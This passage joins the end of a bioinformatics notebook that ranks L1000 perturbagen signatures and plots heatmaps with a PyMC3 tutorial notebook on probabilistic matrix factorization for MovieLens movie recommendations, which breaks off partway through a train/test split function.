display(Markdown("Download score matrix for %s %s signatures ([download](./%s))"%
(alternate, labeller[lib], filename)))
if len(df.index) > 1 and len(df.columns) > 1:
top_index = df.index
if len(top_index) > top_n_signatures:
top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index
top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]
if (df.loc[top_index].sum()>0).sum() < len(df.columns):
blank = df.loc[top_index].sum()==0
blank_indices = [i for i in blank.index if blank[i]]
top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]
top_df = df.loc[top_index]
consensus_norm = quantile_normalize(top_df)
display(Markdown("##### Clustergrammer for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-clustergrammer-%s"%(alternate, lib))
label = "Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "clustergrammer_%s_%s.tsv"%(library.replace(" ", "_"), direction)
figure = clustergrammer(consensus_norm, name, figure, label)
display(Markdown("#### Heatmap for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-heatmap-%s"%(alternate, lib))
label = "Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "heatmap_%s_%s.png"%(library.replace(" ", "_"), direction)
figure = heatmap(consensus_norm, name, figure, label)
df = df[(df>0).sum(1) >= min_sigs]
if consensus_method == 'z-score':
df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]
else:
df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]
if lib in gene_page:
# "pert_name": sig["meta"].get("pert_name", None),
# "pert_time": sig["meta"].get("pert_time", None),
# "pert_dose": sig["meta"].get("pert_dose", None),
# "cell_line": sig["meta"].get("cell_line", None),
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert time", "cell line", "count", "z-sum", "Enrichr gene page"])
stat_df['count'] = (df > 0).sum(1)
# Compute zstat and p value
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df['Enrichr gene page'] = ["https://maayanlab.cloud/Enrichr/#find!gene=%s"%i for i in stat_df["pert name"]]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(lib.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)
stat_html = stat_df.head(25).to_html(escape=False)
display(HTML(stat_html))
else:
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert dose", "pert time", "cell line", "count", "z-sum"])
stat_df['count'] = (df > 0).sum(1)
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert dose"] = metadata[i]["pert_dose"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(library.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
display(stat_df.head(25))
display(Markdown("**Table %d** Top 25 consensus %s %s signatures([download](./%s))"%
(table, alternate, labeller[lib], filename)))
table+=1
# display(df.head())
# display(Markdown("**Table %d** Consensus %s %s signatures ([download](./%s))"%
# (table, alternate, labeller[lib], filename)))
# table+=1
if len(set(stat_df["pert name"])) > 5:
if lib in drug_page:
display(Markdown("#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
for d in drugmonizome_datasets:
label = "%s top ranked enriched terms for %s %s perturbagens"%(d.replace("_", " "), alternate, labeller[lib])
figure = get_drugmonizome_plot(stat_df, label, figure, d)
elif lib in gene_page:
display(Markdown("#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
label = "%s L1000 %s perturbagens"%(alternate, labeller[lib])
figure = enrichment(stat_df, label, figure)
```
## References
[1] Subramanian, A., Narayan, R., Corsello, S. M., Peck, D. D., Natoli, T. E., Lu, X., ... & Golub, T. R. (2017). A next generation connectivity map: L1000 platform and the first 1,000,000 profiles. Cell, 171(6), 1437-1452.
[2] Fernandez, N. F., Gundersen, G. W., Rahman, A., Grimes, M. L., Rikova, K., Hornbeck, P., & Ma’ayan, A. (2017). Clustergrammer, a web-based heatmap visualization and analysis tool for high-dimensional biological data. Scientific data, 4(1), 1-12.
[3] Chen, E. Y., Tan, C. M., Kou, Y., Duan, Q., Wang, Z., Meirelles, G. V., ... & Ma’ayan, A. (2013). Enrichr: interactive and collaborative HTML5 gene list enrichment analysis tool. BMC bioinformatics, 14(1), 1-14.
[4] Kuleshov, M. V., Jones, M. R., Rouillard, A. D., Fernandez, N. F., Duan, Q., Wang, Z., ... & Ma'ayan, A. (2016). Enrichr: a comprehensive gene set enrichment analysis web server 2016 update. Nucleic acids research, 44(W1), W90-W97.
[5] Xie, Z., Bailey, A., Kuleshov, M. V., Clarke, D. J., Evangelista, J. E., Jenkins, S. L., ... & Ma'ayan, A. (2021). Gene set knowledge discovery with Enrichr. Current protocols, 1(3), e90.
[6] Kropiwnicki, E., Evangelista, J. E., Stein, D. J., Clarke, D. J., Lachmann, A., Kuleshov, M. V., ... & Ma’ayan, A. (2021). Drugmonizome and Drugmonizome-ML: integration and abstraction of small molecule attributes for drug enrichment analysis and machine learning. Database, 2021.
[7] Maglott, D., Ostell, J., Pruitt, K. D., & Tatusova, T. (2005). Entrez Gene: gene-centered information at NCBI. Nucleic acids research, 33(suppl_1), D54-D58.
[8] Brown, G. R., Hem, V., Katz, K. S., Ovetsky, M., Wallin, C., Ermolaeva, O., ... & Murphy, T. D. (2015). Gene: a gene-centered information resource at NCBI. Nucleic acids research, 43(D1), D36-D42.
# Probabilistic Matrix Factorization for Making Personalized Recommendations
```
%matplotlib inline
import numpy as np
import pandas as pd
import pymc3 as pm
from matplotlib import pyplot as plt
plt.style.use("seaborn-darkgrid")
print(f"Running on PyMC3 v{pm.__version__}")
```
## Motivation
So you are browsing for something to watch on Netflix and just not liking the suggestions. You just know you can do better. All you need to do is collect some ratings data from yourself and friends and build a recommendation algorithm. This notebook will guide you in doing just that!
We'll start out by getting some intuition for how our model will work. Then we'll formalize our intuition. Afterwards, we'll examine the dataset we are going to use. Once we have some notion of what our data looks like, we'll define some baseline methods for predicting preferences for movies. Following that, we'll look at Probabilistic Matrix Factorization (PMF), which is a more sophisticated Bayesian method for predicting preferences. Having detailed the PMF model, we'll use PyMC3 for MAP estimation and MCMC inference. Finally, we'll compare the results obtained with PMF to those obtained from our baseline methods and discuss the outcome.
## Intuition
Normally if we want recommendations for something, we try to find people who are similar to us and ask their opinions. If Bob, Alice, and Monty are all similar to me, and they all like crime dramas, I'll probably like crime dramas. Now this isn't always true. It depends on what we consider to be "similar". In order to get the best bang for our buck, we really want to look for people who have the most similar taste. Taste being a complex beast, we'd probably like to break it down into something more understandable. We might try to characterize each movie in terms of various factors. Perhaps films can be moody, light-hearted, cinematic, dialogue-heavy, big-budget, etc. Now imagine we go through IMDB and assign each movie a rating in each of the categories. How moody is it? How much dialogue does it have? What's its budget? Perhaps we use numbers between 0 and 1 for each category. Intuitively, we might call this the film's profile.
Now let's suppose we go back to those 5 movies we rated. At this point, we can get a richer picture of our own preferences by looking at the film profiles of each of the movies we liked and didn't like. Perhaps we take the averages across the 5 film profiles and call this our ideal type of film. In other words, we have computed some notion of our inherent _preferences_ for various types of movies. Suppose Bob, Alice, and Monty all do the same. Now we can compare our preferences and determine how similar each of us really are. I might find that Bob is the most similar and the other two are still more similar than other people, but not as much as Bob. So I want recommendations from all three people, but when I make my final decision, I'm going to put more weight on Bob's recommendation than those I get from Alice and Monty.
While the above procedure sounds fairly effective as is, it also reveals an unexpected additional source of information. If we rated a particular movie highly, and we know its film profile, we can compare with the profiles of other movies. If we find one with very close numbers, it is probable we'll also enjoy this movie. Both this approach and the one above are commonly known as _neighborhood approaches_. Techniques that leverage both of these approaches simultaneously are often called _collaborative filtering_ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf). The first approach we talked about uses user-user similarity, while the second uses item-item similarity. Ideally, we'd like to use both sources of information. The idea is we have a lot of items available to us, and we'd like to work together with others to filter the list of items down to those we'll each like best. My list should have the items I'll like best at the top and those I'll like least at the bottom. Everyone else wants the same. If I get together with a bunch of other people, we all watch 5 movies, and we have some efficient computational process to determine similarity, we can very quickly order the movies to our liking.
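As a toy sketch of the user-user neighborhood idea (the ratings below are invented for illustration, not taken from any dataset):

```python
import numpy as np

# Invented 1-5 ratings over the same 5 movies (one vector per person).
me = np.array([5, 4, 1, 2, 5])
bob = np.array([5, 5, 1, 1, 4])
alice = np.array([3, 4, 2, 3, 4])

def cosine_sim(a, b):
    """Cosine similarity between two rating vectors."""
    return a @ b / (np.linalg.norm(a) * np.linalg.norm(b))

# Bob's ratings align with mine more closely than Alice's, so his
# recommendations would get more weight.
print(cosine_sim(me, bob), cosine_sim(me, alice))
```

The same similarity computed between columns of the ratings matrix instead of rows gives the item-item variant.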
## Formalization
Let's take some time to make the intuitive notions we've been discussing more concrete. We have a set of $M$ movies, or _items_ ($M = 100$ in our example above). We also have $N$ people, whom we'll call _users_ of our recommender system. For each item, we'd like to find a $D$ dimensional factor composition (film profile above) to describe the item. Ideally, we'd like to do this without actually going through and manually labeling all of the movies. Manual labeling would be both slow and error-prone, as different people will likely label movies differently. So we model each movie as a $D$ dimensional vector, which is its latent factor composition. Furthermore, we expect each user to have some preferences, but without our manual labeling and averaging procedure, we have to rely on the latent factor compositions to learn $D$ dimensional latent preference vectors for each user. The only thing we get to observe is the $N \times M$ ratings matrix $R$ provided by the users. Entry $R_{ij}$ is the rating user $i$ gave to item $j$. Many of these entries may be missing, since most users will not have rated all 100 movies. Our goal is to fill in the missing values with predicted ratings based on the latent variables $U$ and $V$. We denote the predicted ratings by $R_{ij}^*$. We also define an indicator matrix $I$, with entry $I_{ij} = 0$ if $R_{ij}$ is missing and $I_{ij} = 1$ otherwise.
So we have an $N \times D$ matrix of user preferences which we'll call $U$ and an $M \times D$ factor composition matrix we'll call $V$. We also have a $N \times M$ rating matrix we'll call $R$. We can think of each row $U_i$ as indications of how much each user prefers each of the $D$ latent factors. Each row $V_j$ can be thought of as how much each item can be described by each of the latent factors. In order to make a recommendation, we need a suitable prediction function which maps a user preference vector $U_i$ and an item latent factor vector $V_j$ to a predicted ranking. The choice of this prediction function is an important modeling decision, and a variety of prediction functions have been used. Perhaps the most common is the dot product of the two vectors, $U_i \cdot V_j$ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf).
To better understand CF techniques, let us explore a particular example. Imagine we are seeking to recommend movies using a model which infers five latent factors, $V_j$, for $j = 1,2,3,4,5$. In reality, the latent factors are often unexplainable in a straightforward manner, and most models make no attempt to understand what information is being captured by each factor. However, for the purposes of explanation, let us assume the five latent factors might end up capturing the film profile we were discussing above. So our five latent factors are: moody, light-hearted, cinematic, dialogue, and budget. Then for a particular user $i$, imagine we infer a preference vector $U_i = <0.5, 0.1, 1.5, 1.1, 0.3>$. Also, for a particular item $j$, we infer these values for the latent factors: $V_j = <0.5, 1.5, 1.25, 0.8, 0.9>$. Using the dot product as the prediction function, we would calculate 3.425 as the ranking for that item, which is more or less a neutral preference given our 1 to 5 rating scale.
$$ 0.5 \times 0.5 + 0.1 \times 1.5 + 1.5 \times 1.25 + 1.1 \times 0.8 + 0.3 \times 0.9 = 3.425 $$
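We can check this arithmetic with a couple of lines of NumPy (same made-up vectors as above):

```python
import numpy as np

U_i = np.array([0.5, 0.1, 1.5, 1.1, 0.3])  # user preference vector
V_j = np.array([0.5, 1.5, 1.25, 0.8, 0.9])  # item latent factor vector

# The predicted rating is the dot product of the two vectors.
print(U_i @ V_j)  # ≈ 3.425
```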
## Data
The [MovieLens 100k dataset](https://grouplens.org/datasets/movielens/100k/) was collected by the GroupLens Research Project at the University of Minnesota. This data set consists of 100,000 ratings (1-5) from 943 users on 1682 movies. Each user rated at least 20 movies, and we have basic information on the users (age, gender, occupation, zip). Each movie includes basic information like title, release date, video release date, and genre. We will implement a model that is suitable for collaborative filtering on this data and evaluate it in terms of root mean squared error (RMSE) to validate the results.
The data was collected through the MovieLens web site (movielens.umn.edu) during the seven-month period from September 19th, 1997 through April 22nd, 1998. This data has been cleaned up: users who had fewer than 20 ratings or did not have complete demographic information were removed from this data set.
Let's begin by exploring our data. We want to get a general feel for what it looks like and a sense for what sort of patterns it might contain. Here are the user rating data:
```
data = pd.read_csv(
pm.get_data("ml_100k_u.data"), sep="\t", names=["userid", "itemid", "rating", "timestamp"]
)
data.head()
```
And here is the movie detail data:
```
# fmt: off
movie_columns = ['movie id', 'movie title', 'release date', 'video release date', 'IMDb URL',
'unknown','Action','Adventure', 'Animation',"Children's", 'Comedy', 'Crime',
'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', 'Musical', 'Mystery',
'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western']
# fmt: on
movies = pd.read_csv(
pm.get_data("ml_100k_u.item"),
sep="|",
names=movie_columns,
index_col="movie id",
parse_dates=["release date"],
)
movies.head()
# Extract the ratings from the DataFrame
ratings = data.rating
# Plot histogram
data.groupby("rating").size().plot(kind="bar");
data.rating.describe()
```
This must be a decent batch of movies. From our exploration above, we know most ratings are in the range 3 to 5, and positive ratings are more likely than negative ratings. Let's look at the means for each movie to see if we have any particularly good (or bad) movie here.
```
movie_means = data.join(movies["movie title"], on="itemid").groupby("movie title").rating.mean()
movie_means[:50].plot(kind="bar", grid=False, figsize=(16, 6), title="Mean ratings for 50 movies");
```
While the majority of the movies generally get positive feedback from users, there are definitely a few that stand out as bad. Let's take a look at the worst and best movies, just for fun:
```
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(16, 4), sharey=True)
movie_means.nlargest(30).plot(kind="bar", ax=ax1, title="Top 30 movies in data set")
movie_means.nsmallest(30).plot(kind="bar", ax=ax2, title="Bottom 30 movies in data set");
```
Makes sense to me. We now know there are definite popularity differences between the movies. Some of them are simply better than others, and some are downright lousy. Looking at the movie means allowed us to discover these general trends. Perhaps there are similar trends across users. It might be the case that some users are simply more easily entertained than others. Let's take a look.
```
user_means = data.groupby("userid").rating.mean().sort_values()
_, ax = plt.subplots(figsize=(16, 6))
ax.plot(np.arange(len(user_means)), user_means.values, "k-")
ax.fill_between(np.arange(len(user_means)), user_means.values, alpha=0.3)
ax.set_xticklabels("")  # 1000 labels is nonsensical
ax.set_ylabel("Rating")
ax.set_xlabel(f"{len(user_means)} average ratings per user")
ax.set_ylim(0, 5)
ax.set_xlim(0, len(user_means));
```
We see even more significant trends here. Some users rate nearly everything highly, and some (though not as many) rate nearly everything negatively. These observations will come in handy when considering models to use for predicting user preferences on unseen movies.
## Methods
Having explored the data, we're now ready to dig in and start addressing the problem. We want to predict how much each user is going to like all of the movies he or she has not yet seen.
### Baselines
Every good analysis needs some kind of baseline methods to compare against. It's difficult to claim we've produced good results if we have no reference point for what defines "good". We'll define three very simple baseline methods and find the RMSE using these methods. Our goal will be to obtain lower RMSE scores with whatever model we produce.
#### Uniform Random Baseline
Our first baseline is about as dead stupid as you can get. Every place we see a missing value in $R$, we'll simply fill it with a number drawn uniformly at random in the range [1, 5]. We expect this method to do the worst by far.
$$R_{ij}^* \sim \text{Uniform}(1, 5)$$
#### Global Mean Baseline
This method is only slightly better than the last. Wherever we have a missing value, we'll fill it in with the mean of all observed ratings.
$$\text{global\_mean} = \frac{1}{N \times M} \sum_{i=1}^N \sum_{j=1}^M I_{ij}(R_{ij})$$
$$R_{ij}^* = \text{global\_mean}$$
#### Mean of Means Baseline
Now we're going to start getting a bit smarter. We imagine some users might be easily amused, and inclined to rate all movies more highly. Other users might be the opposite. Additionally, some movies might simply be more witty than others, so all users might rate some movies more highly than others in general. We can clearly see this in our graph of the movie means above. We'll attempt to capture these general trends through per-user and per-movie rating means. We'll also incorporate the global mean to smooth things out a bit. So if we see a missing value in cell $R_{ij}$, we'll average the global mean with the mean of $U_i$ and the mean of $V_j$ and use that value to fill it in.
$$\text{user\_means}_i = \frac{1}{M} \sum_{j=1}^M I_{ij}(R_{ij})$$
$$\text{movie\_means}_j = \frac{1}{N} \sum_{i=1}^N I_{ij}(R_{ij})$$
$$R_{ij}^* = \frac{1}{3} \left(\text{user\_means}_i + \text{movie\_means}_j + \text{global\_mean} \right)$$
```
# Create a base class with scaffolding for our 3 baselines.
def split_title(title):
"""Change "BaselineMethod" to "Baseline Method"."""
words = []
tmp = [title[0]]
for c in title[1:]:
if c.isupper():
words.append("".join(tmp))
tmp = [c]
else:
tmp.append(c)
words.append("".join(tmp))
return " ".join(words)
class Baseline:
"""Calculate baseline predictions."""
def __init__(self, train_data):
"""Simple heuristic-based transductive learning to fill in missing
values in data matrix."""
self.predict(train_data.copy())
def predict(self, train_data):
raise NotImplementedError("baseline prediction not implemented for base class")
def rmse(self, test_data):
"""Calculate root mean squared error for predictions on test data."""
return rmse(test_data, self.predicted)
def __str__(self):
return split_title(self.__class__.__name__)
# Implement the 3 baselines.
class UniformRandomBaseline(Baseline):
"""Fill missing values with uniform random values."""
def predict(self, train_data):
nan_mask = np.isnan(train_data)
masked_train = np.ma.masked_array(train_data, nan_mask)
pmin, pmax = masked_train.min(), masked_train.max()
N = nan_mask.sum()
train_data[nan_mask] = np.random.uniform(pmin, pmax, N)
self.predicted = train_data
class GlobalMeanBaseline(Baseline):
"""Fill in missing values using the global mean."""
def predict(self, train_data):
nan_mask = np.isnan(train_data)
train_data[nan_mask] = train_data[~nan_mask].mean()
self.predicted = train_data
class MeanOfMeansBaseline(Baseline):
"""Fill in missing values using mean of user/item/global means."""
def predict(self, train_data):
nan_mask = np.isnan(train_data)
masked_train = np.ma.masked_array(train_data, nan_mask)
global_mean = masked_train.mean()
user_means = masked_train.mean(axis=1)
item_means = masked_train.mean(axis=0)
self.predicted = train_data.copy()
n, m = train_data.shape
for i in range(n):
for j in range(m):
if np.ma.isMA(item_means[j]):
self.predicted[i, j] = np.mean((global_mean, user_means[i]))
else:
self.predicted[i, j] = np.mean((global_mean, user_means[i], item_means[j]))
baseline_methods = {}
baseline_methods["ur"] = UniformRandomBaseline
baseline_methods["gm"] = GlobalMeanBaseline
baseline_methods["mom"] = MeanOfMeansBaseline
num_users = data.userid.unique().shape[0]
num_items = data.itemid.unique().shape[0]
sparsity = 1 - len(data) / (num_users * num_items)
print(f"Users: {num_users}\nMovies: {num_items}\nSparsity: {sparsity}")
dense_data = data.pivot(index="userid", columns="itemid", values="rating").values
```
## Probabilistic Matrix Factorization
[Probabilistic Matrix Factorization (PMF)](http://papers.nips.cc/paper/3208-probabilistic-matrix-factorization.pdf) [3] is a probabilistic approach to the collaborative filtering problem that takes a Bayesian perspective. The ratings $R$ are modeled as draws from a Gaussian distribution. The mean for $R_{ij}$ is $U_i V_j^T$. The precision $\alpha$ is a fixed parameter that reflects the uncertainty of the estimations; the normal distribution is commonly reparameterized in terms of precision, which is the inverse of the variance. Complexity is controlled by placing zero-mean spherical Gaussian priors on $U$ and $V$. In other words, each row of $U$ is drawn from a multivariate Gaussian with mean $\mu = 0$ and precision which is some multiple of the identity matrix $I$. Those multiples are $\alpha_U$ for $U$ and $\alpha_V$ for $V$. So our model is defined by:
$\newcommand\given[1][]{\:#1\vert\:}$
$$
P(R \given U, V, \alpha^2) =
\prod_{i=1}^N \prod_{j=1}^M
\left[ \mathcal{N}(R_{ij} \given U_i V_j^T, \alpha^{-1}) \right]^{I_{ij}}
$$
$$
P(U \given \alpha_U^2) =
\prod_{i=1}^N \mathcal{N}(U_i \given 0, \alpha_U^{-1} \boldsymbol{I})
$$
$$
P(V \given \alpha_V^2) =
\prod_{j=1}^M \mathcal{N}(V_j \given 0, \alpha_V^{-1} \boldsymbol{I})
$$
Given small precision parameters, the priors on $U$ and $V$ ensure our latent variables do not grow too far from 0. This prevents overly strong user preferences and item factor compositions from being learned. This is commonly known as complexity control, where the complexity of the model here is measured by the magnitude of the latent variables. Controlling complexity like this helps prevent overfitting, which allows the model to generalize better for unseen data. We must also choose an appropriate $\alpha$ value for the normal distribution for $R$. So the challenge becomes choosing appropriate values for $\alpha_U$, $\alpha_V$, and $\alpha$. This challenge can be tackled with the soft weight-sharing methods discussed by [Nowlan and Hinton, 1992](http://www.cs.toronto.edu/~fritz/absps/sunspots.pdf) [4]. However, for the purposes of this analysis, we will stick to using point estimates obtained from our data.
```
import logging
import time
import scipy as sp
import theano
# Enable on-the-fly graph computations, but ignore
# absence of intermediate test values.
theano.config.compute_test_value = "ignore"
# Set up logging.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class PMF:
"""Probabilistic Matrix Factorization model using pymc3."""
def __init__(self, train, dim, alpha=2, std=0.01, bounds=(1, 5)):
"""Build the Probabilistic Matrix Factorization model using pymc3.
:param np.ndarray train: The training data to use for learning the model.
:param int dim: Dimensionality of the model; number of latent factors.
:param int alpha: Fixed precision for the likelihood function.
:param float std: Amount of noise to use for model initialization.
:param (tuple of int) bounds: (lower, upper) bound of ratings.
These bounds will simply be used to cap the estimates produced for R.
"""
self.dim = dim
self.alpha = alpha
self.std = np.sqrt(1.0 / alpha)
self.bounds = bounds
self.data = train.copy()
n, m = self.data.shape
# Perform mean value imputation
nan_mask = np.isnan(self.data)
self.data[nan_mask] = self.data[~nan_mask].mean()
# Low precision reflects uncertainty; prevents overfitting.
# Set to the mean variance across users and items.
self.alpha_u = 1 / self.data.var(axis=1).mean()
self.alpha_v = 1 / self.data.var(axis=0).mean()
# Specify the model.
logging.info("building the PMF model")
with pm.Model() as pmf:
U = pm.MvNormal(
"U",
mu=0,
tau=self.alpha_u * np.eye(dim),
shape=(n, dim),
testval=np.random.randn(n, dim) * std,
)
V = pm.MvNormal(
"V",
mu=0,
tau=self.alpha_v * np.eye(dim),
shape=(m, dim),
testval=np.random.randn(m, dim) * std,
)
R = pm.Normal(
"R", mu=(U @ V.T)[~nan_mask], tau=self.alpha, observed=self.data[~nan_mask]
)
logging.info("done building the PMF model")
self.model = pmf
    def __str__(self):
        return "PMF"
```
We'll also need functions for calculating the MAP and performing sampling on our PMF model. When the observation noise variance $\alpha$ and the prior variances $\alpha_U$ and $\alpha_V$ are all kept fixed, maximizing the log posterior is equivalent to minimizing the sum-of-squared-errors objective function with quadratic regularization terms.
$$ E = \frac{1}{2} \sum_{i=1}^N \sum_{j=1}^M I_{ij} (R_{ij} - U_i V_j^T)^2 + \frac{\lambda_U}{2} \sum_{i=1}^N \|U_i\|_{Fro}^2 + \frac{\lambda_V}{2} \sum_{j=1}^M \|V_j\|_{Fro}^2, $$
where $\lambda_U = \alpha_U / \alpha$, $\lambda_V = \alpha_V / \alpha$, and $\|\cdot\|_{Fro}^2$ denotes the Frobenius norm [3]. Minimizing this objective function gives a local minimum, which is essentially a maximum a posteriori (MAP) estimate. While it is possible to use a fast Stochastic Gradient Descent procedure to find this MAP, we'll be finding it using the utilities built into `pymc3`. In particular, we'll use `find_MAP` with L-BFGS-B optimization (`scipy.optimize.minimize` with `method="L-BFGS-B"`). Having found this MAP estimate, we can use it as our starting point for MCMC sampling.
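To make the objective concrete, here is a direct NumPy evaluation of $E$ (a sketch for sanity-checking optimizer output; `I` is the indicator matrix from the Formalization section, and the toy numbers are made up):

```python
import numpy as np

def map_objective(R, I, U, V, lam_u, lam_v):
    """Regularized sum-of-squared-errors objective minimized by MAP estimation."""
    resid = I * (R - U @ V.T)          # errors counted only on observed cells
    sse = 0.5 * np.sum(resid ** 2)
    reg = 0.5 * lam_u * np.sum(U ** 2) + 0.5 * lam_v * np.sum(V ** 2)
    return sse + reg

# Tiny example: 2 users, 3 items, 2 latent factors.
R = np.array([[5.0, 3.0, 0.0], [4.0, 0.0, 1.0]])
I = np.array([[1, 1, 0], [1, 0, 1]])
U = np.zeros((2, 2))
V = np.zeros((3, 2))
# With U = V = 0, the objective is half the sum of squared observed ratings.
print(map_objective(R, I, U, V, lam_u=0.1, lam_v=0.1))  # 25.5
```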
Since it is a reasonably complex model, we expect the MAP estimation to take some time. So let's save it after we've found it. Note that we define a function for finding the MAP below, assuming it will receive a namespace with some variables in it. Then we attach that function to the PMF class, where it will have such a namespace after initialization. The PMF class is defined in pieces this way so I can say a few things between each piece to make it clearer.
```
def _find_map(self):
"""Find mode of posterior using L-BFGS-B optimization."""
tstart = time.time()
with self.model:
logging.info("finding PMF MAP using L-BFGS-B optimization...")
self._map = pm.find_MAP(method="L-BFGS-B")
elapsed = int(time.time() - tstart)
logging.info("found PMF MAP in %d seconds" % elapsed)
return self._map
def _map(self):
    try:
        return self._map
    except AttributeError:
        return self.find_map()
# Update our class with the new MAP infrastructure.
PMF.find_map = _find_map
PMF.map = property(_map)
```
So now our PMF class has a `map` `property` which will either be computed using L-BFGS-B optimization or reused from a previous call. Once we have the MAP, we can use it as a starting point for our MCMC sampler. We'll need a sampling function in order to draw MCMC samples to approximate the posterior distribution of the PMF model.
```
# Draw MCMC samples.
def _draw_samples(self, **kwargs):
kwargs.setdefault("chains", 1)
with self.model:
self.trace = pm.sample(**kwargs)
# Update our class with the sampling infrastructure.
PMF.draw_samples = _draw_samples
```
We could define some kind of default trace property like we did for the MAP, but that would mean using possibly nonsensical values for `nsamples` and `cores`. Better to leave it as a non-optional call to `draw_samples`. Finally, we'll need a function to make predictions using our inferred values for $U$ and $V$. For user $i$ and movie $j$, a prediction is generated by drawing from $\mathcal{N}(U_i V_j^T, \alpha^{-1})$. To generate predictions from the sampler, we generate an $R$ matrix for each $U$ and $V$ sampled, then we combine these by averaging over the $K$ samples.
$$
P(R_{ij}^* \given R, \alpha, \alpha_U, \alpha_V) \approx
\frac{1}{K} \sum_{k=1}^K \mathcal{N}(R_{ij}^* \given U_i^{(k)} (V_j^{(k)})^T, \alpha^{-1})
$$
We'll want to inspect the individual $R$ matrices before averaging them for diagnostic purposes. So we'll write code for the averaging piece during evaluation. The function below simply draws an $R$ matrix given a $U$ and $V$ and the fixed $\alpha$ stored in the PMF object.
```
def _predict(self, U, V):
"""Estimate R from the given values of U and V."""
R = np.dot(U, V.T)
n, m = R.shape
sample_R = np.random.normal(R, self.std)
# bound ratings
low, high = self.bounds
sample_R[sample_R < low] = low
sample_R[sample_R > high] = high
return sample_R
PMF.predict = _predict
```
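Averaging the per-sample reconstructions is then straightforward; here is a self-contained sketch with synthetic sample arrays standing in for a real trace (the `average_predictions` helper and the synthetic numbers are illustrative, not part of the notebook's API):

```python
import numpy as np

def average_predictions(U_samples, V_samples, std, bounds=(1, 5)):
    """Approximate R* by averaging noisy per-sample reconstructions,
    mirroring the PMF.predict logic above."""
    low, high = bounds
    preds = []
    for U, V in zip(U_samples, V_samples):
        sample_R = np.random.normal(U @ V.T, std)   # draw R for this sample
        preds.append(np.clip(sample_R, low, high))  # bound the ratings
    return np.mean(preds, axis=0)                   # average over K samples

# Synthetic stand-in for a trace: K = 50 posterior samples.
rng = np.random.default_rng(0)
K, n, m, D = 50, 4, 6, 2
U_samples = rng.normal(1.0, 0.1, size=(K, n, D))
V_samples = rng.normal(1.0, 0.1, size=(K, m, D))
R_star = average_predictions(U_samples, V_samples, std=0.5)
print(R_star.shape)  # (4, 6)
```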
One final thing to note: the dot products in this model are often constrained using a logistic function $g(x) = 1/(1 + \exp(-x))$, which bounds the predictions to the range [0, 1]. To facilitate this bounding, the ratings are also mapped to the range [0, 1] using $t(x) = (x - \text{min}) / \text{range}$. The authors of PMF also introduced a constrained version which performs better on users with fewer ratings [3]. Both models are generally improvements upon the basic model presented here. However, in the interest of time and space, these will not be implemented here.
## Evaluation
### Metrics
In order to understand how effective our models are, we'll need to be able to evaluate them. We'll be evaluating in terms of root mean squared error (RMSE), which looks like this:
$$
RMSE = \sqrt{ \frac{ \sum_{i=1}^N \sum_{j=1}^M I_{ij} (R_{ij} - R_{ij}^*)^2 }
{ \sum_{i=1}^N \sum_{j=1}^M I_{ij} } }
$$
In this case, the RMSE can be thought of as the standard deviation of our predictions from the actual user preferences.
```
# Define our evaluation function.
def rmse(test_data, predicted):
"""Calculate root mean squared error.
Ignoring missing values in the test data.
"""
I = ~np.isnan(test_data) # indicator for missing values
N = I.sum() # number of non-missing values
sqerror = abs(test_data - predicted) ** 2 # squared error array
mse = sqerror[I].sum() / N # mean squared error
return np.sqrt(mse) # RMSE
```
### Training Data vs. Test Data
The next thing we need to do is split our data into a training set and a test set. Matrix factorization techniques use [transductive learning](http://en.wikipedia.org/wiki/Transduction_%28machine_learning%29) rather than inductive learning. So we produce a test set by taking a random sample of the cells in the full $N \times M$ data matrix. The values selected as test samples are replaced with `nan` values in a copy of the original data matrix to produce the training set. Since we'll be producing random splits, let's also write out the train/test sets generated. This will allow us to replicate our results. We'd like to be able to identify which split is which, so we'll take a hash of the indices selected for testing and use that to save the data.
```
# Define a function for splitting train/test data.
def split_train_test(data, percent_test=0.1):
"""Split the data into train/test sets.
:param float percent_test: Fraction of data to use for testing. Default 0.1.
"""
n, m = data.shape # # users, # movies
N = n * m # # cells in matrix
# Prepare train/test ndarrays.
train = data.copy()
test = np.ones(data.shape) * np.nan
# Draw random sample of training data to use for testing.
tosample = np.where(~np.isnan(train)) # ignore nan values in data
idx_pairs = list(zip(tosample[0], tosample[1])) # tuples of row/col index pairs
test_size = int(len(idx_pairs) * percent_test) # use 10% of data as test set
train_size = len(idx_pairs) - test_size # and remainder for training
indices = np.arange(len(idx_pairs)) # indices of index pairs
sample = np.random.choice(indices, replace=False, size=test_size)
# Transfer random sample from train set to test set.
